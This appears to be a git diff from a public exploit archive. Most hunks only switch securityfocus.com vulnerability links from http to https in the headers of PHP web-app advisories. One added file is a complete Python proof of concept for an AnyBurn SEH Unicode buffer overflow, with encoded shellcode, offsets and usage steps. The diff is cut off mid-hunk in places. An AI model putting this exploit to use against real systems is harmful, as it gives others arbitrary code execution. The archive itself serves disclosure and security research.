b/exploits/php/webapps/30656.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26032/info +source: https://www.securityfocus.com/bid/26032/info boastMachine is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30657.txt b/exploits/php/webapps/30657.txt index 09a818312..06dd130fa 100644 --- a/exploits/php/webapps/30657.txt +++ b/exploits/php/webapps/30657.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26033/info +source: https://www.securityfocus.com/bid/26033/info UMI CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30658.txt b/exploits/php/webapps/30658.txt index c3cebcba4..1e8872781 100644 --- a/exploits/php/webapps/30658.txt +++ b/exploits/php/webapps/30658.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26034/info +source: https://www.securityfocus.com/bid/26034/info CRS Manager is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30659.txt b/exploits/php/webapps/30659.txt index 647ae08f7..c971023c7 100644 --- a/exploits/php/webapps/30659.txt +++ b/exploits/php/webapps/30659.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26035/info +source: https://www.securityfocus.com/bid/26035/info Nucleus CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30660.txt b/exploits/php/webapps/30660.txt index b150ea5bd..b7c975b00 100644 --- a/exploits/php/webapps/30660.txt +++ b/exploits/php/webapps/30660.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26036/info +source: https://www.securityfocus.com/bid/26036/info Stride 1.0 Courses is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30662.txt b/exploits/php/webapps/30662.txt index 145c85a91..4dc794250 100644 --- a/exploits/php/webapps/30662.txt +++ b/exploits/php/webapps/30662.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26041/info +source: https://www.securityfocus.com/bid/26041/info Scott Manktelow Design Stride 1.0 Content Management System is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30663.txt b/exploits/php/webapps/30663.txt index 40e1d5cb8..87e09f9d5 100644 --- a/exploits/php/webapps/30663.txt +++ b/exploits/php/webapps/30663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26045/info +source: https://www.securityfocus.com/bid/26045/info Linkliste is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30664.txt b/exploits/php/webapps/30664.txt index 4a4b2a2ec..7a94431bf 100644 --- a/exploits/php/webapps/30664.txt +++ b/exploits/php/webapps/30664.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26046/info +source: https://www.securityfocus.com/bid/26046/info Scott Manktelow Design Stride 1.0 Merchant is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30682.txt b/exploits/php/webapps/30682.txt index 31c956e6e..0507e1982 100644 --- a/exploits/php/webapps/30682.txt +++ b/exploits/php/webapps/30682.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26126/info +source: https://www.securityfocus.com/bid/26126/info SiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30683.txt b/exploits/php/webapps/30683.txt index d8a8ed486..e275995f3 100644 --- a/exploits/php/webapps/30683.txt +++ b/exploits/php/webapps/30683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26126/info +source: https://www.securityfocus.com/bid/26126/info SiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30684.txt b/exploits/php/webapps/30684.txt index a21b63bc2..02aa9d257 100644 --- a/exploits/php/webapps/30684.txt +++ b/exploits/php/webapps/30684.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26126/info +source: https://www.securityfocus.com/bid/26126/info SiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30685.txt b/exploits/php/webapps/30685.txt index 01b744b4d..9d36f41f1 100644 --- a/exploits/php/webapps/30685.txt +++ b/exploits/php/webapps/30685.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26126/info +source: https://www.securityfocus.com/bid/26126/info SiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30686.txt b/exploits/php/webapps/30686.txt index 634e4a5d2..75be80986 100644 --- a/exploits/php/webapps/30686.txt +++ b/exploits/php/webapps/30686.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26126/info +source: https://www.securityfocus.com/bid/26126/info SiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30691.txt b/exploits/php/webapps/30691.txt index cef71cdbf..845af5d96 100644 --- a/exploits/php/webapps/30691.txt +++ b/exploits/php/webapps/30691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26128/info +source: https://www.securityfocus.com/bid/26128/info OmniVista 4760 is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30693.txt b/exploits/php/webapps/30693.txt index 1daba8a4f..21ec14d27 100644 --- a/exploits/php/webapps/30693.txt +++ b/exploits/php/webapps/30693.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26136/info +source: https://www.securityfocus.com/bid/26136/info SocketKB is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/30694.txt b/exploits/php/webapps/30694.txt index c0413198d..ae0f490f1 100644 --- a/exploits/php/webapps/30694.txt +++ b/exploits/php/webapps/30694.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26138/info +source: https://www.securityfocus.com/bid/26138/info SocketMail is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30695.txt b/exploits/php/webapps/30695.txt index c023a57bf..f060699d6 100644 --- a/exploits/php/webapps/30695.txt +++ b/exploits/php/webapps/30695.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26140/info +source: https://www.securityfocus.com/bid/26140/info rNote is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30697.txt b/exploits/php/webapps/30697.txt index 4aeb0d7ab..a0f9433ca 100644 --- a/exploits/php/webapps/30697.txt +++ b/exploits/php/webapps/30697.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26143/info +source: https://www.securityfocus.com/bid/26143/info ReloadCMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30698.txt b/exploits/php/webapps/30698.txt index d9f30e29f..d8c57e409 100644 --- a/exploits/php/webapps/30698.txt +++ b/exploits/php/webapps/30698.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26155/info +source: https://www.securityfocus.com/bid/26155/info Flatnuke3 is prone to an unauthorized-access vulnerability because it fails to adequately verify administrative credentials while logging in via the 'File Manager' module. diff --git a/exploits/php/webapps/30699.txt b/exploits/php/webapps/30699.txt index d020cabba..98c23c293 100644 --- a/exploits/php/webapps/30699.txt +++ b/exploits/php/webapps/30699.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26167/info +source: https://www.securityfocus.com/bid/26167/info Hackish is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/30700.txt b/exploits/php/webapps/30700.txt index 9d68d6052..d707400d8 100644 --- a/exploits/php/webapps/30700.txt +++ b/exploits/php/webapps/30700.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26169/info +source: https://www.securityfocus.com/bid/26169/info DMCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30701.txt b/exploits/php/webapps/30701.txt index 25d009a9d..0ec7ffbcd 100644 --- a/exploits/php/webapps/30701.txt +++ b/exploits/php/webapps/30701.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26171/info +source: https://www.securityfocus.com/bid/26171/info Jeebles Directory is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30703.txt b/exploits/php/webapps/30703.txt index c1108fe8a..e86b4f79d 100644 --- a/exploits/php/webapps/30703.txt +++ b/exploits/php/webapps/30703.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26179/info +source: https://www.securityfocus.com/bid/26179/info Japanese PHP Gallery Hosting is prone to an arbitrary-file-upload vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/php/webapps/30707.txt b/exploits/php/webapps/30707.txt index fb23bb8d1..dd3e27b4e 100644 --- a/exploits/php/webapps/30707.txt +++ b/exploits/php/webapps/30707.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26194/info +source: https://www.securityfocus.com/bid/26194/info basicFramework is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30712.txt b/exploits/php/webapps/30712.txt index 1c8e79a8b..a52d76822 100644 --- a/exploits/php/webapps/30712.txt +++ b/exploits/php/webapps/30712.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26213/info +source: https://www.securityfocus.com/bid/26213/info Multi-Forums is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries. diff --git a/exploits/php/webapps/30715.txt b/exploits/php/webapps/30715.txt index 70044f37d..c88adfc3e 100644 --- a/exploits/php/webapps/30715.txt +++ b/exploits/php/webapps/30715.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26228/info +source: https://www.securityfocus.com/bid/26228/info WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30716.txt b/exploits/php/webapps/30716.txt index 7b512dec9..1cd4a3806 100644 --- a/exploits/php/webapps/30716.txt +++ b/exploits/php/webapps/30716.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26232/info +source: https://www.securityfocus.com/bid/26232/info SMART-SHOP is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30717.txt b/exploits/php/webapps/30717.txt index f0d936a61..968a74c6e 100644 --- a/exploits/php/webapps/30717.txt +++ b/exploits/php/webapps/30717.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26234/info +source: https://www.securityfocus.com/bid/26234/info Omnistar Live is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30718.txt b/exploits/php/webapps/30718.txt index 1e5a2af0f..f767f2b81 100644 --- a/exploits/php/webapps/30718.txt +++ b/exploits/php/webapps/30718.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26237/info +source: https://www.securityfocus.com/bid/26237/info Saxon is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30719.txt b/exploits/php/webapps/30719.txt index 9793bc31a..3a1fc6868 100644 --- a/exploits/php/webapps/30719.txt +++ b/exploits/php/webapps/30719.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26238/info +source: https://www.securityfocus.com/bid/26238/info Saxon is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30731.txt b/exploits/php/webapps/30731.txt index e826c0223..298fea80e 100644 --- a/exploits/php/webapps/30731.txt +++ b/exploits/php/webapps/30731.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26289/info +source: https://www.securityfocus.com/bid/26289/info Synergiser is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30732.txt b/exploits/php/webapps/30732.txt index d965ef47f..5dd9e4041 100644 --- a/exploits/php/webapps/30732.txt +++ b/exploits/php/webapps/30732.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26291/info +source: https://www.securityfocus.com/bid/26291/info CONTENTCustomizer is prone to an information-disclosure vulnerability. diff --git a/exploits/php/webapps/30733.txt b/exploits/php/webapps/30733.txt index 0b27f9489..072903950 100644 --- a/exploits/php/webapps/30733.txt +++ b/exploits/php/webapps/30733.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26301/info +source: https://www.securityfocus.com/bid/26301/info phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30734.txt b/exploits/php/webapps/30734.txt index dcca91e79..91998f688 100644 --- a/exploits/php/webapps/30734.txt +++ b/exploits/php/webapps/30734.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26312/info +source: https://www.securityfocus.com/bid/26312/info Helios Calendar is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30737.txt b/exploits/php/webapps/30737.txt index 37dc99784..77981a292 100644 --- a/exploits/php/webapps/30737.txt +++ b/exploits/php/webapps/30737.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26329/info +source: https://www.securityfocus.com/bid/26329/info Galmeta Post is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30738.txt b/exploits/php/webapps/30738.txt index 1ba525b14..3fe2eb8d2 100644 --- a/exploits/php/webapps/30738.txt +++ b/exploits/php/webapps/30738.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26330/info +source: https://www.securityfocus.com/bid/26330/info E-Vendejo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30739.txt b/exploits/php/webapps/30739.txt index b72958225..884774831 100644 --- a/exploits/php/webapps/30739.txt +++ b/exploits/php/webapps/30739.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26331/info +source: https://www.securityfocus.com/bid/26331/info JLMForo System is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30741.txt b/exploits/php/webapps/30741.txt index 59082269f..83843491f 100644 --- a/exploits/php/webapps/30741.txt +++ b/exploits/php/webapps/30741.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26335/info +source: https://www.securityfocus.com/bid/26335/info easyGB is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30745.html b/exploits/php/webapps/30745.html index 346e16383..b87be2ddc 100644 --- a/exploits/php/webapps/30745.html +++ b/exploits/php/webapps/30745.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26358/info +source: https://www.securityfocus.com/bid/26358/info MS-TopSites is prone to an unauthorized-access vulnerability and an HTML-injection vulnerability because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30746.txt b/exploits/php/webapps/30746.txt index 37d641dc4..950df1708 100644 --- a/exploits/php/webapps/30746.txt +++ b/exploits/php/webapps/30746.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26375/info +source: https://www.securityfocus.com/bid/26375/info Computer Associates SiteMinder Web Agent is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30748.txt b/exploits/php/webapps/30748.txt index 01fad15b1..7e0a3051b 100644 --- a/exploits/php/webapps/30748.txt +++ b/exploits/php/webapps/30748.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26392/info +source: https://www.securityfocus.com/bid/26392/info Xoops Mylinks module is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30750.pl b/exploits/php/webapps/30750.pl index c02b9329c..1a4652eb5 100755 --- a/exploits/php/webapps/30750.pl +++ b/exploits/php/webapps/30750.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26406/info +source: https://www.securityfocus.com/bid/26406/info The PHP-Nuke Advertising Module is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30751.html b/exploits/php/webapps/30751.html index 4a843a6d3..e89a3a77c 100644 --- a/exploits/php/webapps/30751.html +++ b/exploits/php/webapps/30751.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26407/info +source: https://www.securityfocus.com/bid/26407/info Miro Broadcast Machine is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30754.txt b/exploits/php/webapps/30754.txt index 452e39840..9efa4d2cf 100644 --- a/exploits/php/webapps/30754.txt +++ b/exploits/php/webapps/30754.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26411/info +source: https://www.securityfocus.com/bid/26411/info AutoIndex PHP Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/30757.txt b/exploits/php/webapps/30757.txt index a692b5760..ddf45c591 100644 --- a/exploits/php/webapps/30757.txt +++ b/exploits/php/webapps/30757.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26417/info +source: https://www.securityfocus.com/bid/26417/info X7 Chat is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30758.txt b/exploits/php/webapps/30758.txt index 61f564b96..f26022252 100644 --- a/exploits/php/webapps/30758.txt +++ b/exploits/php/webapps/30758.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26417/info +source: https://www.securityfocus.com/bid/26417/info X7 Chat is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30762.txt b/exploits/php/webapps/30762.txt index 022a4fa78..fe1a533bf 100644 --- a/exploits/php/webapps/30762.txt +++ b/exploits/php/webapps/30762.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26432/info +source: https://www.securityfocus.com/bid/26432/info WP-SlimStat Plugin for WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30764.txt b/exploits/php/webapps/30764.txt index 6b5218efe..dee1bae78 100644 --- a/exploits/php/webapps/30764.txt +++ b/exploits/php/webapps/30764.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26437/info +source: https://www.securityfocus.com/bid/26437/info CONTENTCustomizer is prone to an unauthorized access vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30774.txt b/exploits/php/webapps/30774.txt index a556cb67b..5264bd822 100644 --- a/exploits/php/webapps/30774.txt +++ b/exploits/php/webapps/30774.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26470/info +source: https://www.securityfocus.com/bid/26470/info Liferay Portal is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30792.html b/exploits/php/webapps/30792.html index 87190c128..67bef28b4 100644 --- a/exploits/php/webapps/30792.html +++ b/exploits/php/webapps/30792.html @@ -1,5 +1,5 @@ 20ac, 81 --> 81 +# 82 --> 201a, 83 --> 0192 +# 84 --> 201e, 85 --> 2026 +# 86 --> 2020, 87 --> 2021 +# 88 --> 02c6, 89 --> 2030 +# 8a --> 0160, 8b --> 2039 +# 8c --> 0152, 8d --> 8d +# 8e --> 017d, 8f --> 8f +# 90 --> 90 , 91 --> 2018 +# 92 --> 2019, 93 --> 201c +# 94 --> 201d, 95 --> 2022 +# 96 --> 2013, 97 --> 2014 +# 98 --> 02dc, 99 --> 2122 +# 9a --> 0161, 9b --> 203a +# 9c --> 0153, 9d --> 9d +# 9e --> 017e, 9f --> 0178 +# +# PoC +# 1.) Generate sploit_anyBURN_seh_unicode.txt, copy the contents to clipboard +# 2.) In the application, open 'Copy disc to image file' +# 3.) Paste the contents of the TXT file in 'Image file name' +# 4.) Click "Create Now" and watch Anyburn BURN! + +import sys, struct + +filename = "sploit_anyburn_seh_unicode.txt" + +# Maximum length +maxlen = 10000 + +# Shellcode +# msfvenom -p windows/exec cmd=calc.exe -e x86/unicode_mixed -f python -b "\x00\x0a\x0d" -v shellcode bufferregister=eax +# Size 512 +shellcode = "" +shellcode += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41" +shellcode += "\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" +shellcode += "\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51" +shellcode += "\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59" +shellcode += "\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68" +shellcode += "\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31" +shellcode += "\x31\x41\x49\x41\x49\x41\x42\x41\x42\x41\x42\x51" +shellcode += "\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31" +shellcode += "\x31\x41\x49\x41\x4a\x51\x59\x41\x5a\x42\x41\x42" +shellcode += "\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39" +shellcode += "\x75\x34\x4a\x42\x79\x6c\x39\x58\x35\x32\x6d\x30" +shellcode += "\x4b\x50\x6b\x50\x73\x30\x64\x49\x4b\x35\x4e\x51" +shellcode += "\x35\x70\x61\x54\x74\x4b\x6e\x70\x6e\x50\x64\x4b" +shellcode += "\x61\x42\x7a\x6c\x72\x6b\x62\x32\x6d\x44\x64\x4b" +shellcode += "\x44\x32\x6b\x78\x5a\x6f\x45\x67\x6f\x5a\x6b\x76" +shellcode += "\x4d\x61\x49\x6f\x34\x6c\x4f\x4c\x43\x31\x71\x6c" +shellcode += "\x39\x72\x4e\x4c\x4b\x70\x49\x31\x38\x4f\x4c\x4d" +shellcode += "\x6a\x61\x76\x67\x67\x72\x58\x72\x31\x42\x62\x37" +shellcode += "\x64\x4b\x50\x52\x7a\x70\x32\x6b\x4f\x5a\x4f\x4c" +shellcode += "\x42\x6b\x70\x4c\x6b\x61\x34\x38\x7a\x43\x51\x38" +shellcode += "\x6d\x31\x78\x51\x6f\x61\x52\x6b\x30\x59\x6f\x30" +shellcode += "\x4b\x51\x79\x43\x72\x6b\x4f\x59\x5a\x78\x68\x63" +shellcode += "\x6c\x7a\x30\x49\x62\x6b\x4e\x54\x42\x6b\x6b\x51" +shellcode += "\x4a\x36\x4c\x71\x6b\x4f\x44\x6c\x46\x61\x78\x4f" +shellcode += "\x4c\x4d\x69\x71\x56\x67\x6c\x78\x57\x70\x63\x45" +shellcode += "\x59\x66\x6a\x63\x51\x6d\x4a\x58\x4d\x6b\x71\x6d" +shellcode += "\x4e\x44\x52\x55\x4b\x34\x42\x38\x54\x4b\x4e\x78" +shellcode += "\x6b\x74\x79\x71\x79\x43\x53\x36\x74\x4b\x4a\x6c" +shellcode += "\x50\x4b\x34\x4b\x31\x48\x4d\x4c\x69\x71\x57\x63" +shellcode += "\x72\x6b\x4a\x64\x74\x4b\x69\x71\x78\x50\x31\x79" +shellcode += "\x50\x44\x6d\x54\x6c\x64\x71\x4b\x51\x4b\x70\x61" +shellcode += "\x72\x39\x70\x5a\x30\x51\x39\x6f\x6b\x30\x61\x4f" +shellcode += "\x31\x4f\x6f\x6a\x32\x6b\x4d\x42\x4a\x4b\x72\x6d" +shellcode += "\x4f\x6d\x51\x5a\x39\x71\x42\x6d\x75\x35\x75\x62" +shellcode += "\x4d\x30\x59\x70\x4d\x30\x70\x50\x33\x38\x6e\x51" +shellcode += "\x52\x6b\x42\x4f\x53\x57\x6b\x4f\x46\x75\x55\x6b" +shellcode += "\x6a\x50\x46\x55\x33\x72\x4f\x66\x62\x48\x66\x46" +shellcode += "\x72\x75\x65\x6d\x43\x6d\x39\x6f\x67\x65\x6d\x6c" +shellcode += "\x39\x76\x61\x6c\x4a\x6a\x31\x70\x59\x6b\x79\x50" +shellcode += "\x74\x35\x49\x75\x35\x6b\x6f\x57\x6e\x33\x72\x52" +shellcode += "\x62\x4f\x70\x6a\x39\x70\x42\x33\x39\x6f\x49\x45" +shellcode += "\x42\x43\x4f\x71\x52\x4c\x70\x63\x4c\x6e\x30\x65" +shellcode += "\x51\x68\x51\x55\x49\x70\x41\x41" + +# Align reg EBP to RET into EAX +# EBP = 0x04f6acb8, Buffer = 0x04f6b70a, Buffer - EBP = 0x0a52 --> 0x0b00 +align_ebp = ( + "\x73" # Padding + "\x55" # PUSH EBP + "\x73" # Padding + "\x58" # POP EAX + "\x73" # Padding + "\x05\x0f\x11" # "\x05\x00\x0f\x00\x11" # 05000f0011 add eax,0x11000f00 --\ + "\x73" # Padding |--> Adds 0x0b00 bytes + "\x2d\x04\x11" # "\x2d\x00\x04\x00\x11" # 2d00040011 sub eax,0x11000400 --/ + "\x73" # Padding + "\x50" # PUSH EAX + "\x73" # Padding + "\xc3" # RET +) + +# Offsets +crash_nseh = 9197 # NSEH, might be different on other Windows version/SP +crash_seh = crash_nseh + 4 # SEH +ret_jmp = 87 # Offset for which the 'align_ebp' instructions land + +# Variables +prefix = "\x73" * ret_jmp # Padding +prefix += shellcode # UNICODE encoded shellcode +prefix += "\x73" * (crash_nseh - len(prefix)) # Additional padding to reach NSEH +nseh = "\x83\x43" # 0x83 Expands to 0x0192 --> XCHG EAX,EDX # Expanded instruction in SEH now does get executed due to swapped regs +seh = "\x95\x47" # 0x00470095 Expands to 0x00472022 --> # POP POP RET # AnyBurn.exe +suffix = align_ebp # Align registers to jump to beginning of buffer +suffix += "\x73" * (maxlen - len(prefix + nseh + seh + suffix)) # Padding + +# Crafting payload +payload = prefix + nseh + seh + suffix + +# Create file +f = open(filename, 'wb') +f.write(payload) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/4839.pl b/exploits/windows/local/4839.pl index 511b89f75..6d8770391 100755 --- a/exploits/windows/local/4839.pl +++ b/exploits/windows/local/4839.pl @@ -4,7 +4,7 @@ # Web:: http://coolplayer.sourceforge.net/ # Playlist(.m3u) File Local Buffer Overflow Exploit # -# Vuln: http://www.securityfocus.com/bid/21396 +# Vuln: https://www.securityfocus.com/bid/21396 # # # Greetz: Luigi Auriemma que ha descubierto una nueva vulnerabilidad en este software junto diff --git a/exploits/windows/local/559.c b/exploits/windows/local/559.c index 4640864c7..e0c8d3902 100644 --- a/exploits/windows/local/559.c +++ b/exploits/windows/local/559.c @@ -1,4 +1,3 @@ - /* -------------------------------Advisory---------------------------------- Luigi Auriemma diff --git a/exploits/windows/local/8010.pl b/exploits/windows/local/8010.pl index 60456276a..9112648d6 100755 --- a/exploits/windows/local/8010.pl +++ b/exploits/windows/local/8010.pl @@ -3,7 +3,7 @@ # FeedDemon version 2.7.0.0 Buffer overFlow # Reference: # http://security.bkis.vn/?p=329 -# http://www.securityfocus.com/bid/33630/info +# https://www.securityfocus.com/bid/33630/info # http://secunia.com/advisories/33718/ # Tested in Windows XP Sp2 (English) # Created by cenjan (xcenjanx@yahoo.com) diff --git a/exploits/windows/remote/10054.txt b/exploits/windows/remote/10054.txt index a5eef74c5..dfbd2cae0 100644 --- a/exploits/windows/remote/10054.txt +++ b/exploits/windows/remote/10054.txt @@ -18,7 +18,7 @@ This component and included in default SAPGUI installation. Details ******* -Information about this vulnerability in public since 2007 (http://www.securityfocus.com/bid/26467/info) +Information about this vulnerability in public since 2007 (https://www.securityfocus.com/bid/26467/info) We found that wulnerable component VSFlexGrid is still not patched and is using in default SAP GUI Client installations Tested on: @@ -95,7 +95,7 @@ References http://dsecrg.com/pages/vul/show.php?id=117 https://service.sap.com/sap/support/notes/1327004 https://service.sap.com/sap/support/notes/1092631 -http://www.securityfocus.com/bid/26467/info +https://www.securityfocus.com/bid/26467/info About diff --git a/exploits/windows/remote/1184.c b/exploits/windows/remote/1184.pl old mode 100644 new mode 100755 similarity index 100% rename from exploits/windows/remote/1184.c rename to exploits/windows/remote/1184.pl diff --git a/exploits/windows/remote/12312.rb b/exploits/windows/remote/12312.rb index 89caa42d7..c4a45a3e1 100755 --- a/exploits/windows/remote/12312.rb +++ b/exploits/windows/remote/12312.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://seclists.org/bugtraq/2010/Feb/202' ], [ 'URL', 'http://code.google.com/p/easyftpsvr/'], [ 'URL', 'https://tegosecurity.com/etc/return_overwrite/RCE_easy_ftp_server_1.7.0.2.zip' ], - [ 'URL', 'http://www.securityfocus.com/bid/38262/exploit'] + [ 'URL', 'https://www.securityfocus.com/bid/38262/exploit'] ], 'Privileged' => false, 'Payload' => diff --git a/exploits/windows/remote/1279.pm b/exploits/windows/remote/1279.pm index 930b3cc78..e823be946 100644 --- a/exploits/windows/remote/1279.pm +++ b/exploits/windows/remote/1279.pm @@ -38,7 +38,7 @@ my $info = }), 'Refs' => [ - ['URL ', "http://www.securityfocus.com/bid/15131"], + ['URL ', "https://www.securityfocus.com/bid/15131"], ], 'Targets' => [ diff --git a/exploits/windows/remote/15991.html b/exploits/windows/remote/15991.html index e62715635..7add83421 100644 --- a/exploits/windows/remote/15991.html +++ b/exploits/windows/remote/15991.html @@ -1,4 